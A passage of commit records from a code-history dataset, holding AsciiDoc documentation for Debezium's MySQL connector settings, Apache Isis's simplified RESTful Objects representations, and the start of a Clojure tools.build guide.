after receiving no data is `recovery.attempts` x `recovery.poll.interval.ms`.\n\n|`database.history.skip.unparseable.ddl`\n|`false`\n|Boolean value that specifies if connector should ignore malformed or unknown database statements or stop processing and let operator to fix the issue.\nThe safe default is `false`.\nSkipping should be used only with care as it can lead to data loss or mangling when binlog is processed.\n\n|`database.history.store.only.monitored.tables.ddl` +\n0.7.2 and later\n|`false`\n|Boolean value that specifies if connector should should record all DDL statements or (when `true`) only those that are relevant to tables that are monitored by Debezium (via filter configuration).\nThe safe default is `false`.\nThis feature should be used only with care as the missing data might be necessary when the filters are changed.\n\n|`database.ssl.mode`\n|`disabled`\n|Specifies whether to use an encrypted connection. The default is `disabled`, and specifies to use an unencrypted connection.\n\nThe `preferred` option establishes an encrypted connection if the server supports secure connections but falls back to an unencrypted connection otherwise.\n\nThe `required` option establishes an encrypted connection but will fail if one cannot be made for any reason.\n\nThe `verify_ca` option behaves like `required` but additionally it verifies the server TLS certificate against the configured Certificate Authority (CA) certificates and will fail if it doesn't match any valid CA certificates.\n\nThe `verify_identity` option behaves like `verify_ca` but additionally verifies that the server certificate matches the host of the remote connection.\n\n|`binlog.buffer.size` +\n0.7.0 and later\n|0\n|The size of a look-ahead buffer used by the binlog reader. +\nUnder specific conditions it is possible that MySQL binlog contains uncommitted data finished by a `ROLLBACK` statement.\nTypical examples are using savepoints or mixing temporary and regular table changes in a single transaction. +\nWhen a beginning of a transaction is detected then Debezium tries to roll forward the binlog position and find either `COMMIT` or `ROLLBACK` so it can decide whether the changes from the transaction will be streamed or not.\nThe size of the buffer defines the maximum number of changes in the transaction that Debezium can buffer while searching for transaction boundaries.\nIf the size of transaction is larger than the buffer then Debezium needs to rewind and re-read the events that has not fit into the buffer while streaming. Value `0` disables buffering. +\nDisabled by default. +\n_Note:_ This feature should be considered an incubating one. We need a feedback from customers but it is expected that it is not completely polished.\n\n|`snapshot.mode`\n|`initial`\n|Specifies the criteria for running a snapshot upon startup of the connector. The default is `initial`, and specifies the connector can run a snapshot only when no offsets have been recorded for the logical server name. The `when_needed` option specifies that the connector run a snapshot upon startup whenever it deems it necessary (when no offsets are available, or when a previously recorded offset specifies a binlog location or GTID that is not available in the server). The `never` option specifies that the connect should never use snapshots and that upon first startup with a logical server name the connector should read from the beginning of the binlog; this should be used with care, as it is only valid when the binlog is guaranteed to contain the entire history of the database. If you don't need the topics to contain a consistent snapshot of the data but only need them to have the changes since the connector was started, you can use the `schema_only` option, where the connector only snapshots the schemas (not the data).\n\n`schema_only_recovery` is a recovery option for an existing connector to recover a corrupted or lost database history topic, or to periodically \"clean up\" a database history topic (which requires infinite retention) that may be growing unexpectedly.\n\n|`snapshot.locking.mode` +\n_0.7.3 and later_\n|`minimal`\n|Controls if and how long the connector holds onto the global MySQL read lock (preventing any updates to the database) while it is performing a snapshot. There are three possible values `minimal`, `extended`, and `none`. +\n\n`minimal` The connector holds the global read lock for just the initial portion of the snapshot while the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table, and this can be done in a consistent fashion using the REPEATABLE READ transaction even when the global read lock is no longer held and while other MySQL clients are updating the database. +\n\n`extended` In some cases where clients are submitting operations that MySQL excludes from REPEATABLE READ semantics, it may be desirable to block all writes for the entire duration of the snapshot. For these such cases, use this option. +\n\n`none` Will prevent the connector from acquiring any table locks during the snapshot process. This value can be used with all snapshot modes but it is safe to use if and _only_ if no schema changes are happening while the snapshot is taken. Note that for tables defined with MyISAM engine, the tables would still be locked despite this property being set as MyISAM acquires a table lock. This behaviour is unlike InnoDB engine which acquires row level locks.\n\n|`snapshot.minimal.locks` +\n_deprecated since 0.7.3_\n|`true`\n|Controls how long the connector holds onto the global MySQL read lock (preventing any updates to the database) while it is performing a snapshot. The default is `true`, meaning the connector holds the global read lock for just the initial portion of the snapshot while the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table, and this can be done in a consistent fashion using the `REPEATABLE READ` transaction even when the global read lock is no longer held and while other\nMySQL clients are updating the database. However, in some cases where clients are submitting operations that MySQL excludes from `REPEATABLE READ` semantics, it may be desirable to _block all writes_ for the entire duration of the snapshot. In only such cases, set this property to `false`. +\n_Deprecated:_ This option has been deprecated and replaced with the `snapshot.locking.mode` configuration option. This option will be removed in a future release. +\n\nA `snapshot.minimal.locks` value of `true` should be replaced with `snapshot.locking.mode` set to `minimal`. +\n\nA `snapshot.minimal.locks` value of `false` should be replaced with `snapshot.locking.mode` set to `extended`.\n\n|`snapshot.select.statement.overrides` +\n0.7.0 and later\n|\n|Controls which rows from tables will be included in snapshot. +\nThis property contains a comma-separated list of fully-qualified tables _(DB_NAME.TABLE_NAME)_. Select statements for the individual tables are specified in further configuration properties, one for each table, identified by the id `snapshot.select.statement.overrides.[DB_NAME].[TABLE_NAME]`. The value of those properties is the SELECT statement to use when retrieving data from the specific table during snapshotting. _A possible use case for large append-only tables is setting a specific point where to start (resume) snapshotting, in case a previous snapshotting was interrupted._ +\n*Note*: This setting has impact on snapshots only. Events captured from binlog are not affected by it at all.\n\n|`min.row.count.to.stream.results`\n|`1000`\n|During a snapshot operation, the connector will query each included table to produce a read event for all rows in that table. This parameter determines whether the MySQL connection will pull all results for a table into memory (which is fast but requires large amounts of memory), or whether the results will instead be streamed (can be slower, but will work for very large tables). The value specifies the minimum number of rows a table must contain before the connector will stream results, and defaults to 1,000. Set this parameter to '0' to skip all table size checks and always stream all results during a snapshot.\n\n|`heartbeat.interval.ms` +\n0.7.3 and later\n|`0`\n|Controls how frequently the heartbeat messages are sent. +\nThis property contains an interval in milli-seconds that defines how frequently the connector sends heartbeat messages into a heartbeat topic.\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|`heartbeat.topics.prefix` +\n0.7.3 and later\n|`__debezium-heartbeat`\n|Controls the naming of the topic to which heartbeat messages are sent. +\nThe topic is named according to the pattern `<heartbeat.topics.prefix>.<server.name>`.\n\n|`database.initial.statements` +\n0.8.0 and later\n|\n|A semicolon separated list of SQL statements to be executed when a JDBC connection (not the transaction log reading connection) to the database is established.\nUse doubled semicolon (';;') to use a semicolon as a character and not as a delimiter. +\n_Note: The connector may establish JDBC connections at its own discretion, so this should typically be used for configuration of session parameters only, but not for executing DML statements._\n\n|`snapshot.delay.ms` +\n0.8.0 and later\n|\n|An interval in milli-seconds that the connector should wait before taking a snapshot after starting up; +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|`snapshot.fetch.size` +\n0.9.5 and later\n|\n|Specifies the maximum number of rows that should be read in one go from each table while taking a snapshot.\nThe connector will read the table contents in multiple batches of this size.\n\n|`enable.time.adjuster` +\n0.9.3 and later\n|\n|MySQL allows user to insert year value as either 2-digit or 4-digit.\nIn case of two digits the value is automatically mapped to 1970 - 2069 range.\nThis is usually done by database. +\nSet to `true` (the default) when Debezium should do the conversion. +\nSet to `false` when conversion is fully delegated to the database.\n|=======================\n\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer. Specifically, all connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history, and all those that begin with the prefix `database.history.consumer.` are used (without the prefix) when creating the Kafka consumer that reads the database history upon connector startup.\n\nFor example, the following connector configuration properties can be used to http:\/\/kafka.apache.org\/documentation.html#security_configclients[secure connections to the Kafka broker]:\n\nIn addition to the _pass-through_ to the Kafka producer and consumer, the properties starting with `database.`, e.g. `database.tinyInt1isBit=false` are passed to the JDBC URL.\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the http:\/\/kafka.apache.org\/documentation.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. (The MySQL connector does use the http:\/\/kafka.apache.org\/documentation.html#newconsumerconfigs[new consumer].)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8817ac990e5602c157354c72193be5b5cb7543e6","subject":"ISIS-1243: more updates to RO viewer docs","message":"ISIS-1243: more updates to RO viewer docs\n","repos":"apache\/isis,oscarbou\/isis,niv0\/isis,sanderginn\/isis,niv0\/isis,apache\/isis,estatio\/isis,estatio\/isis,sanderginn\/isis,apache\/isis,oscarbou\/isis,sanderginn\/isis,apache\/isis,incodehq\/isis,sanderginn\/isis,oscarbou\/isis,incodehq\/isis,estatio\/isis,incodehq\/isis,niv0\/isis,niv0\/isis,apache\/isis,estatio\/isis,apache\/isis,incodehq\/isis,oscarbou\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_ugvro_simplified-representations.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/_ugvro_simplified-representations.adoc","new_contents":"[[_ugvro_simplified-representations]]\n= Simplified Representations\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:_basedir: ..\/\n:_imagesdir: images\/\n\n\n\nThe representations defined by the RO spec are very rich and enable complex client-side applications to be built.\nHowever, their sophistication can be an impediment to their use if one wishes to write a simple app using third-party\ncomponents that expect to consume much simpler representations. Examples of such tools are\nlink:http:\/\/angular-ui.github.io\/bootstrap\/[Angular Bootstrap],\nlink:http:\/\/vitalets.github.io\/angular-xeditable\/[Angular XEditable],\nlink:https:\/\/github.com\/mgcrea\/angular-strap[Angular Strap].\n\n\nAs of `1.11.0-SNAPSHOT`, Apache Isis provides support for its own simplified representation for the most commonly-used\nrepresentations. This is implemented using the `ContentNegotiationService` described in the\nxref:ugvro.adoc#_ugvro_architecture[architecture] chapter.\n\n\n\n[[_ugvro_simplified-representations_apache-isis-profile]]\n== The Apache Isis \"Profile\"\n\nThe RO spec uses the standard `Accept` header for content negotiation, and defines its own \"profile\" for the standard\nrepresentations; these take the form:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.restfulobjects:repr-types\/xxx\"\n----\n\nwhere \"xxx\" varies by resource. The detail can be found in section 2.4.1 of the RO spec.\n\nThe Apache Isis viewer also defines its own \"Isis\" profile which enables the client to request simplified\nrepresentations for the most frequently accessed resources. This is done by specifying an `Accept` header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nNot every resource supports this header, but the most commonly accessed ones do. In each case the server will set the\n`Content-Type` header so that the client knows how to process the representation.\n\nThe screencast below demonstrates the feature.\n\nvideo::HMSqapQDY_4[youtube,width=\"853px\",height=\"480px\"]\n\n\nThe sections below explain in a little more detail what is returned when this profile is activated.\n\n\n[[_ugvro_simplified-representations_domain-object]]\n== Domain Object\n\nIf a domain object resource (section 14) is accessed with the Apache Isis profile, the resultant representation is a\nJSON object with simple key\/value pairs for each property.\n\nThe contents of any collections are also eagerly returned, consisting of an array of elements of each referenced\nobject. Each such element contains key\/value pairs of each property (in other words, a grid of data is returned).\nEach element also has a special `$$href` property (so that the client can easily navigate to a resource for that\nobject) and a `$$title` property (to use as a label, eg the hyperlink text).\n\nIn addition, the representation defined by the RO spec is also included, under a special `$$ro` property.\n\nFor example, using the (non-ASF) http:\/\/github.com\/isisaddons\/isis-app-todoapp[Isis addons' todoapp], accessing\nthis resource:\n\n[source]\n----\nhttp:\/\/localhost:8080\/restful\/objects\/TODO\/45\n----\n\nwith an `Accept` request header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nreturns the following representation:\n\n[source]\n----\n{\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/45\", \/\/ <1>\n \"$$title\" : \"Buy bread due by 2015-12-04\", \/\/ <2>\n \"description\" : \"Buy bread\", \/\/ <3>\n \"category\" : \"Domestic\",\n \"subcategory\" : \"Shopping\",\n \"complete\" : false,\n \"atPath\" : \"\/users\/sven\",\n ...\n \"similarTo\" : [ { \/\/ <4>\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/46\",\n \"$$title\" : \"Buy milk due by 2015-12-04\",\n \"description\" : \"Buy milk\",\n \"category\" : \"Domestic\",\n ...\n }, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/47\",\n \"$$title\" : \"Buy stamps due by 2015-12-04\",\n \"description\" : \"Buy stamps\",\n \"category\" : \"Domestic\",\n ...\n },\n ...\n } ],\n \"dependencies\" : [ ],\n \"$$ro\" : { \/\/ <5>\n \"links\" : [ ... ],\n \"extensions\" : { ... },\n \"title\" : \"Buy bread due by 2015-12-04\",\n \"domainType\" : \"TODO\",\n \"instanceId\" : \"45\",\n \"members\" : { ... }\n }\n}\n----\n<1> hyperlink to the representation\n<2> title of the domain object\n<3> all the properties of the domain object (to which the caller has access), as key\/value pairs\n<4> contents of each collection\n<5> special `$$ro` json-prop, being the normal RO Spec representation for this object\n\nwith a `Content-Type` header:\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"object\"\n----\n\n\n[[_ugvro_simplified-representations_object-collection]]\n== Domain Object Collection\n\nIf a domain object collection (section 17) is accessed with this profile, then the resultant representation is as\nan array of elements of key\/value for each referenced object, and again each element the containing the key\/value\npairs of the properties of that object (a grid, again). +\n\nIn addition, the representation defined by the RO spec is also included, as a special object with a single `$$ro`\nproperty.\n\nFor example, using the (non-ASF) http:\/\/github.com\/isisaddons\/isis-app-todoapp[Isis addons' todoapp], accessing\nthis resource:\n\n[source]\n----\nhttp:\/\/localhost:8080\/restful\/objects\/TODO\/45\/collections\/similarTo\n----\n\nwith an `Accept` request header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nreturns the following representation:\n\n[source]\n----\n[ \/\/ <1>\n{\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/46\", \/\/ <2>\n \"$$title\" : \"Buy milk due by 2015-12-04\", \/\/ <3>\n \"description\" : \"Buy milk\", \/\/ <4>\n \"category\" : \"Domestic\",\n ...\n}, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/47\",\n \"$$title\" : \"Buy stamps due by 2015-12-04\",\n \"description\" : \"Buy stamps\",\n \"category\" : \"Domestic\",\n ...\n}, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/48\",\n \"$$title\" : \"Mow lawn due by 2015-12-10\",\n \"description\" : \"Mow lawn\",\n \"category\" : \"Domestic\",\n ...\n},\n...\n, {\n \"$$ro\" : { \/\/ <5>\n \"id\" : \"similarTo\",\n \"memberType\" : \"collection\",\n \"links\" : [ ... ],\n \"extensions\" : { ... },\n \"value\" : [ ... ]\n }\n}\n]\n----\n<1> returns a JSON array, not a JSON object\n<2> hyperlink to the representation\n<3> title of the domain object\n<4> all the properties of the domain object (to which the caller has access), as key\/value pairs\n<5> last element is a special object with a single `$$ro` json-prop, being the normal RO Spec representation for this object\n\nwith a `Content-Type` header:\n\n[source]\n----\nContent-Type: application\/json;profile=\"urn:org.apache.isis\/v1\";repr-type=\"object-collection\"\n----\n\n\n[[_ugvro_simplified-representations_action-invocation]]\n== Action Invocation\n\nWhen an action is invoked, it can return a domain object, a list, a scalar, or return nothing.\n\n=== Returning an Object\n\nIf the action returned an object, then the domain object representation described\nxref:ugvro.adoc#_ugvro_simplified-representations_domain-object[above] is returned.\n\nFor example, using the (non-ASF) http:\/\/github.com\/isisaddons\/isis-app-todoapp[Isis addons' todoapp], accessing\nthis resource:\n\n[source]\n----\nhttp:\/\/localhost:8080\/restful\/objects\/TODO\/45\/actions\/updateCost\/invoke\n----\n\nwith an `Accept` request header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nreturns the following representation:\n\n[source]\n----\n\n{\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/45\",\n \"$$title\" : \"Buy bread due by 2015-12-04\",\n \"description\" : \"Buy bread\",\n \"category\" : \"Domestic\",\n \"subcategory\" : \"Shopping\",\n \"complete\" : false,\n ...\n \"similarTo\" : [ ... ]\n ...\n \"$$ro\" : { ... }\n}\n----\n\nwith a `Content-Type` of:\n\n[source]\n----\nContent-Type: application\/json;profile=\"urn:org.apache.isis\/v1\";repr-type=\"object\"\n----\n\n\\... in other words no different to a representation obtained of the returned domain object directly.\n\n\n=== Returning a List\n\nOn the other hand if the action returned a list (a \"standalone\" collection, then an array representation is returned.\nThis is very similar to that returned by a\nxref:ugvro.adoc#_ugvro_simplified-representations_object-collection[(parented) object collection], though with a\nslightly different `Content-Type` to distinguish.\n\nFor example, using the (non-ASF) http:\/\/github.com\/isisaddons\/isis-app-todoapp[Isis addons' todoapp], accessing\nthis resource:\n\n[source]\n----\nhttp:\/\/localhost:8080\/restful\/services\/ToDoItems\/actions\/notYetComplete\/invoke\n----\n\nwith an `Accept` request header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nreturns the following representation:\n\n[source]\n----\n[ {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/45\",\n \"$$title\" : \"Buy bread due by 2015-12-04\",\n \"description\" : \"Buy bread\",\n \"category\" : \"Domestic\",\n ...\n}, {\n \"$$href\" : \"http:\/\/localhost:8080\/restful\/objects\/TODO\/46\",\n \"$$title\" : \"Buy milk due by 2015-12-04\",\n \"description\" : \"Buy milk\",\n \"category\" : \"Domestic\",\n ...\n},\n...\n, {\n \"$$ro\" : {\n \"links\" : [ ... ]\n \"resulttype\" : \"list\",\n \"result\" : { ... }\n \"value\" : [ ... ],\n \"links\" : [ ... ],\n \"extensions\" : { }\n }\n }\n} ]\n----\n\nwith a `Content-Type` header:\n\n[source]\n----\nContent-Type: application\/json;profile=\"urn:org.apache.isis\/v1\";repr-type=\"list\"\n----\n\n=== Returning Scalar\/Nothing\n\nNote that actions returning scalar values or nothing (which includes `void` actions) are not supported; for these the\nregular RO spec representation will be returned.\n\n\n[[_ugvro_simplified-representations_other-representations]]\n== Supporting other Representations\n\nSometimes though you may want to extend or change the representations generated. This might be because you want to\nwrite a RESTful client that uses a particular library (say a Javascript library or web components) that can only handle representations in a certain form.\n\nOr, you might want to have Apache Isis generate representations according to some other \"standard\", of which there are\nmany:\n\n* Mike Kelly's http:\/\/stateless.co\/hal_specification.html[HAL] specification\n* Mike Amundsen's http:\/\/amundsen.com\/media-types\/collection\/[Collection+JSON] specification\n* Kevin Swiber's https:\/\/github.com\/kevinswiber\/siren[Siren] specification\n* Steve Klabnik's http:\/\/jsonapi.org\/[JSON API] specification\n* Gregg Cainus' https:\/\/github.com\/cainus\/hyper-json-spec[Hyper+JSON] specification\n* the W3C's https:\/\/www.w3.org\/TR\/json-ld\/[JSON-LD] specification\n* Markus Lanthaler's http:\/\/www.markus-lanthaler.com\/hydra\/[Hydra] specification.\n\nA good discussion about the relative merits of several of these different hypermedia formats can be found https:\/\/groups.google.com\/forum\/#!msg\/api-craft\/NgjzQYVOE4s\/EAB2jxtU_TMJ[here].\n\nOr, of course, you may have your own internal specification that you wish to use.\n\nSupporting any of these alternative representations can be achieved by providing a suitable implementation of\n`ContentNegotiationService`. The existing implementations (eg `ContentNegotiationServiceSimplified`) can be used as a\nstarting point.\n\n[NOTE]\n====\nThese will, admittedly, need to access the internal APIs for the Apache Isis metamodel, and you should be aware that\nthese are not formal API; they may change over time. That said, they are very stable and have not changed\nsignificantly over the last few years.\n====\n\n\n\ninclude::_ugvro_simplified-representations_configuration-properties.adoc[leveloffset=+1]\n\n\n","old_contents":"[[_ugvro_simplified-representations]]\n= Simplified Representations\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:_basedir: ..\/\n:_imagesdir: images\/\n\n\n\nThe representations defined by the RO spec are very rich and enable complex client-side applications to be built.\nHowever, their sophistication can be an impediment to their use if one wishes to write a simple app using third-party\ncomponents that expect to consume much simpler representations. Examples of such tools are\nlink:http:\/\/angular-ui.github.io\/bootstrap\/[Angular Bootstrap],\nlink:http:\/\/vitalets.github.io\/angular-xeditable\/[Angular XEditable],\nlink:https:\/\/github.com\/mgcrea\/angular-strap[Angular Strap].\n\n\nAs of `1.11.0-SNAPSHOT`, Apache Isis provides support for its own simplified representation for the most commonly-used\nrepresentations. This is implemented using the `ContentNegotiationService` described in the\nxref:ugvro.adoc#_ugvro_architecture[architecture] chapter.\n\n\n\n[[_ugvro_simplified-representations_apache-isis-profile]]\n== The Apache Isis \"Profile\"\n\nThe RO spec uses the standard `Accept` header for content negotiation, and defines its own \"profile\" for the standard\nrepresentations; these take the form:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.restfulobjects:repr-types\/xxx\"\n----\n\nwhere \"xxx\" varies by resource. The detail can be found in section 2.4.1 of the RO spec.\n\nThe Apache Isis viewer also defines its own \"Isis\" profile which enables the client to request simplified\nrepresentations for the most frequently accessed resources. This is done by specifying an `Accept` header of:\n\n[source]\n----\nAccept: application\/json;profile=\"urn:org.apache.isis\/v1\"\n----\n\nNot every resource supports this header, but the most commonly accessed ones do. In each case the server will set the\n`Content-Type` header so that the client knows how to process the representation.\n\nThe screencast below demonstrates the feature.\n\nvideo::HMSqapQDY_4[youtube,width=\"853px\",height=\"480px\"]\n\n\nAnd the table below explains in a little more detail what is returned when this profile is activated.\n\n[cols=\"1a,4a\", options=\"header\"]\n|===\n\n| Resource\n| Description\n\n\n|Domain object +\n(section 14)\n|The representation of a domain object is simple key\/value pairs for each property. The contents of any collections are\nalso eagerly returned, consisting of an array of elements of each referenced object. Each such element contains\nkey\/value pairs of each property (in other words, a grid of data is returned), along with special `$$href` and\n`$$title` properties. +\n\nIn addition, the representation defined by the RO spec is also included, under a special `$$ro` property. +\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"object\"\n----\n\n|Object Collection +\n(section 17)\n|Collections are represented as an array of elements of key\/value for each referenced object, and again each element\nthe containing the key\/value pairs of the properties of that object (a grid, again). +\n\nIn addition, the representation defined by the RO spec is also included, as a special object with a single `$$ro`\nproperty. +\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"object-collection\"\n----\n\n|Action invocation +\n(section 19)\n|If the action returned an object, then the domain object representation described above is returned. +\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"object\"\n----\n\nIf the action returned a list, then the same array representation as (parented) object collections is returned, though\nwith a slightly different `Content-Type` to distinguish:\n\n[source]\n----\nContent-Type: application\/json;\n profile=\"urn:org.apache.isis\/v1\";repr-type=\"list\"\n----\n\nNote that actions returning scalar values or void are not supported; for these the regular RO spec representation will\nbe returned.\n\n|===\n\n\n\n\n[[_ugvro_simplified-representations_other-representations]]\n== Supporting other Representations\n\nSometimes though you may want to extend or change the representations generated. This might be because you want to\nwrite a RESTful client that uses a particular library (say a Javascript library or web components) that can only handle representations in a certain form.\n\nOr, you might want to have Apache Isis generate representations according to some other \"standard\", of which there are\nmany:\n\n* Mike Kelly's http:\/\/stateless.co\/hal_specification.html[HAL] specification\n* Mike Amundsen's http:\/\/amundsen.com\/media-types\/collection\/[Collection+JSON] specification\n* Kevin Swiber's https:\/\/github.com\/kevinswiber\/siren[Siren] specification\n* Steve Klabnik's http:\/\/jsonapi.org\/[JSON API] specification\n* Gregg Cainus' https:\/\/github.com\/cainus\/hyper-json-spec[Hyper+JSON] specification\n* the W3C's https:\/\/www.w3.org\/TR\/json-ld\/[JSON-LD] specification\n* Markus Lanthaler's http:\/\/www.markus-lanthaler.com\/hydra\/[Hydra] specification.\n\nA good discussion about the relative merits of several of these different hypermedia formats can be found https:\/\/groups.google.com\/forum\/#!msg\/api-craft\/NgjzQYVOE4s\/EAB2jxtU_TMJ[here].\n\nOr, of course, you may have your own internal specification that you wish to use.\n\nSupporting any of these alternative representations can be achieved by providing a suitable implementation of\n`ContentNegotiationService`. The existing implementations (eg `ContentNegotiationServiceSimplified`) can be used as a\nstarting point.\n\n[NOTE]\n====\nThese will, admittedly, need to access the internal APIs for the Apache Isis metamodel, and you should be aware that\nthese are not formal API; they may change over time. That said, they are very stable and have not changed\nsignificantly over the last few years.\n====\n\n\n\ninclude::_ugvro_simplified-representations_configuration-properties.adoc[leveloffset=+1]\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0001267daa37b0affd19f4bc25f2621541aa9e7a","subject":"update to latest tags in tools.build","message":"update to latest tags in tools.build\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/tools_build.adoc","new_file":"content\/guides\/tools_build.adoc","new_contents":"= tools.build Guide\nAlex Miller\n2021-06-22\n:type: guides\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nhttps:\/\/github.com\/clojure\/tools.build[tools.build] is a library of functions for building Clojure projects. It is intended to be used in a build program to create user-invokable target functions. Also see the https:\/\/clojure.github.io\/tools.build[API docs].\n\n== Builds are programs\n\nThe philosophy behind tools.build is that your project build is inherently a program - a series of instructions to create one or more project artifacts from your project source files. We want to write this program with our favorite programming language, Clojure, and tools.build is a library of functions commonly needed for builds that can be connected together in flexible ways. Writing a build program does take a bit more code than other declarative approaches, but can be easily extended or customized far into the future, creating a build that grows with your project.\n\n== Setup\n\nThere is no installation step - tools.build is simply a library that your build program uses. You will create an alias in your `deps.edn` that includes tools.build as a dependency and a source path to the build program. Builds are designed to be easily executed as a project \"tool\" in the Clojure CLI (with -T). In the Clojure CLI, \"tools\" are programs that provide functionality and do not use your project deps or classpath. Tools executed with `-T:an-alias` remove all project deps and paths, add `\".\"` as a path, and include any other deps or paths as defined in `:an-alias`.\n\nAs such, you will need an alias in your deps.edn that defines the build classpath and includes the path to your build source, for example:\n\n[source,clojure]\n----\n{:paths [\"src\"] ;; project paths\n :deps {} ;; project deps\n\n :aliases\n {;; Run with clj -T:build function-in-build\n :build {:deps {io.github.clojure\/tools.build {:git\/tag \"TAG\" :git\/sha \"SHA\"}}\n :ns-default build}}}\n----\n\nFind the most recent TAG and SHA to use at https:\/\/github.com\/clojure\/tools.build#release-information.\n\n[NOTE]\n====\nThe git dep and Clojure CLI examples in this guide assume the use of Clojure CLI 1.10.3.933 or higher.\n====\n\nAs mentioned above, running a tool with -T will create a classpath that does not include the project :paths and :deps. Using `-T:build` will use only the `:paths` and `:deps` from the `:build` alias. The root deps.edn is still included, which will pull in Clojure as well (but it would also come in as a dependency of tools.build). The `:paths` are not specified here, so no additional paths are added, however, `-T` includes the project root `\".\"` as a path by default.\n\nSo executing `clj -T:build jar` will use an effective classpath here of:\n\n* `\".\"` (added by -T)\n* org.clojure\/clojure (from the root deps.edn `:deps`) and transitive deps\n* org.clojure\/tools.build (from the `:build` alias `:deps`) and transitive deps\n\nThe `:ns-default` specifies the default Clojure namespace to find the function specified on the classpath. Because the only local path is the default `\".\"`, we should expect to find the build program at `build.clj` in the root of our project. Note that the path roots (via the `:build` alias `:paths`) and the namespace of the build program itself relative to those paths roots are fully under your control. You may wish to put them in a subdirectory of your project too.\n\nAnd then finally, on the command line we specify the function to run in the build, here `jar`. That function will be executed in the `build` namespace, and passed a map built using the same arg passing style as `-X` - args are provided as alternating keys and values.\n\nThe remainder of this guide demonstrates individual common use cases and how to satisfy them with tools.build programs.\n\n== Source library jar build\n\nThe most common Clojure build creates a jar file containing Clojure source code. To do this with tools.build we'll use the following tasks:\n\n* `create-basis` - to create a project basis\n* `copy-dir` - to copy Clojure source and resources into a working dir\n* `write-pom` - to write a pom file in the working dir\n* `jar` - to jar up the working dir into a jar file\n\nThe build.clj will look like this:\n\n[source,clojure]\n----\n(ns build\n (:require [clojure.tools.build.api :as b]))\n\n(def lib 'my\/lib1)\n(def version (format \"1.2.%s\" (b\/git-count-revs nil)))\n(def class-dir \"target\/classes\")\n(def basis (b\/create-basis {:project \"deps.edn\"}))\n(def jar-file (format \"target\/%s-%s.jar\" (name lib) version))\n\n(defn clean [_]\n (b\/delete {:path \"target\"}))\n\n(defn jar [_]\n (b\/write-pom {:class-dir class-dir\n :lib lib\n :version version\n :basis basis\n :src-dirs [\"src\"]})\n (b\/copy-dir {:src-dirs [\"src\" \"resources\"]\n :target-dir 